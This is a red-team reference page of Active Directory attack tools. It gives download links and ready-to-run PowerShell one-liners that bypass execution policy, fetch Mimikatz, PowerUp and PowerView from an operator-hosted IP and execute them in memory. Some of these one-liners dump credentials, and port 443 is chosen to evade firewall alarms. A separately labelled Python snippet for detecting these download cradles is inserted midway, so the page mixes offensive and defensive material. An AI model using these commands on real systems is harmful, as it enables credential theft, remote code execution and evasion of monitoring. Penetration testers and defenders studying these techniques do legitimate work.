Important Scripts & Links

These are some of the important scripts that may be useful to a Red Team while exploring a network with Active Directory. There is major overlap with the previous section; the difference is that this section is simply a list of scripts along with their usage and commands (where required), whereas the previous section is organised by need/requirement and the best script or command for each.

The heading for each tool gives a gist of its use, and each entry contains two parts:

  • Link to download the script

  • Command to download the script locally and execute it from memory

I have followed the method of downloading the scripts to a local repository and then using a PowerShell command to download and execute them from memory, since the targeted machines may not have internet access.

I have also used port 443 in the HTTP link since I use either 80 or 443 for all such activities to avoid any alarms the firewall/IPS may raise. You can change it to the port from which you host the scripts.
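From the defender's side, the download-and-execute pattern used throughout this list (IEX plus DownloadString, an execution-policy bypass, and plain HTTP served on 443 so the scheme and port disagree) is exactly what process-creation telemetry can flag. The following Python is an added example, not part of the original page or any of the linked projects; the command lines and the indicator weights are constructed for illustration.

```python
import re

# Constructed sample CommandLine values in the shape of Windows Security 4688 /
# Sysmon Event ID 1 process-creation records; not real telemetry.
SAMPLE_COMMAND_LINES = [
    'powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient)'
    '.DownloadString(\'http://192.168.119.208:443/PowerUp.ps1\');Invoke-AllChecks"',
    'powershell.exe -ExecutionPolicy Bypass -NoProfile -File C:\\scripts\\backup.ps1',
    'powershell.exe -nop -w hidden -c "iex (new-object net.webclient)'
    '.downloadstring(\'https://10.0.0.5/a.ps1\')"',
    'C:\\Windows\\System32\\notepad.exe',
]

# Indicator name, pattern, weight. The weights are an assumed triage scheme.
INDICATORS = [
    ("download_cradle",
     re.compile(r"\b(?:iex|invoke-expression)\b.*?download(?:string|data|file)", re.I), 3),
    ("execution_policy_bypass",
     re.compile(r"-(?:exec|ep|executionpolicy)\s+bypass\b", re.I), 1),
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I), 1),
]
URL_RE = re.compile(r"\b(https?)://[^\s'\"/:]+(?::(\d+))?", re.I)
MISMATCHED = {("http", "443"), ("https", "80")}

def score_command_line(cmd: str) -> dict:
    """Return the indicators found in one command line and their summed weight."""
    found = [name for name, rx, _ in INDICATORS if rx.search(cmd)]
    weights = {name: w for name, _, w in INDICATORS}
    score = sum(weights[n] for n in found)
    # Plain HTTP on 443 (or HTTPS on 80) is the port-blending trick described above:
    # scheme and well-known port disagree, which a proxy log can also reveal.
    for scheme, port in URL_RE.findall(cmd):
        if (scheme.lower(), port) in MISMATCHED:
            found.append("scheme_port_mismatch")
            score += 2
            break
    return {"command_line": cmd, "indicators": found, "score": score}

def triage(command_lines, threshold: int = 3) -> list:
    """Keep only command lines whose score reaches the threshold, highest first."""
    hits = [score_command_line(c) for c in command_lines]
    return sorted((h for h in hits if h["score"] >= threshold),
                  key=lambda h: h["score"], reverse=True)

if __name__ == "__main__":
    for hit in triage(SAMPLE_COMMAND_LINES):
        print(hit["score"], hit["indicators"], hit["command_line"][:60])
```

The legitimate `-ExecutionPolicy Bypass -File` line scores below the threshold on its own, which is the point: the bypass flag is common in admin scripts and only becomes interesting alongside a cradle or a port mismatch.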

Scripts

Invoke-MassMimikatz.ps1 # Dump credentials on a remote host

https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PewPewPew/Invoke-MassMimikatz.ps1

powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://192.168.119.121:443/Invoke-MassMimikatz.ps1');'$env:COMPUTERNAME'|Invoke-MassMimikatz -Verbose"

Invoke-Mimikatz.ps1 # Dump credentials from memory

https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1

powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://192.168.119.208:443/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

PowerUp.ps1 # Privilege escalation checks

https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1

powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://192.168.119.208:443/PowerUp.ps1');Invoke-AllChecks"

PowerView.ps1 # Network & AD exploration

https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1

powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('http://192.168.119.208:443/powerview.ps1')"

Read more about the PowerView commands:

https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon

https://gist.github.com/ssstonebraker/a1964b2f20acc8edb239409b6c4906ce
